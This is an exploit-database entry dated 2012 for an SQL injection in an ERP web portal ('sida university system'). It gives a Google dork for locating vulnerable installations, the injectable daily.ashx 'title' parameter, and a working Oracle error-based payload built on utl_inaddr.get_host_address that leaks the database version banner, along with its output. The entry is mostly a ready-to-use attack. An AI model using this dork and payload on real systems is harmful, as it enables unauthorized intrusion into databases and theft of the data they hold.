Enterprise Resource planning SQL Injection Vulnerability

2012-06-04T00:00:00
ID 1337DAY-ID-18434
Type zdt
Reporter Shahram Darvishvand
Modified 2012-06-04T00:00:00

Description

Exploit for asp platform in category web applications

                                        
                                             # Exploit Author: Shahram Darvishvand [karaji_kt21]  <darvishvand.shahram[at]gmail[dot]com>
 # Exploit Title: [erp (Enterprise Resource plannin) SQL Injection Vulnerability ]
 # Vendor : sida university system
 # Date: [15/May/2012]
 # Google Dork:     "نرم افزار جامع erp شامل قوانین کپی رایت می باشد و نوع نسخه بتا می باشد" 
 # Version: [version 1389/09/17]
 # Tested on: [ASHX .. Application powered by Oracle DBMS]
============================================================
This Vulnerability Is On version 1389/09/17 
--------------------------------------------
Exploit :  http://[IP Or Domain]/Portal/WUC/daily.ashx?title=
=============================================================
Example :  http://[IP Or Domain]/Portal/WUC/daily.ashx?title=
'or%201=utl_inaddr.get_host_address((select%20banner%20from%20v$version%20where%20rownum=1))--

Response : 
Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 - 64bit
 -------------------------------------------------------
[+] Greetz : F.Saveh , Behrooz_Ice



#  0day.today [2018-02-06]  #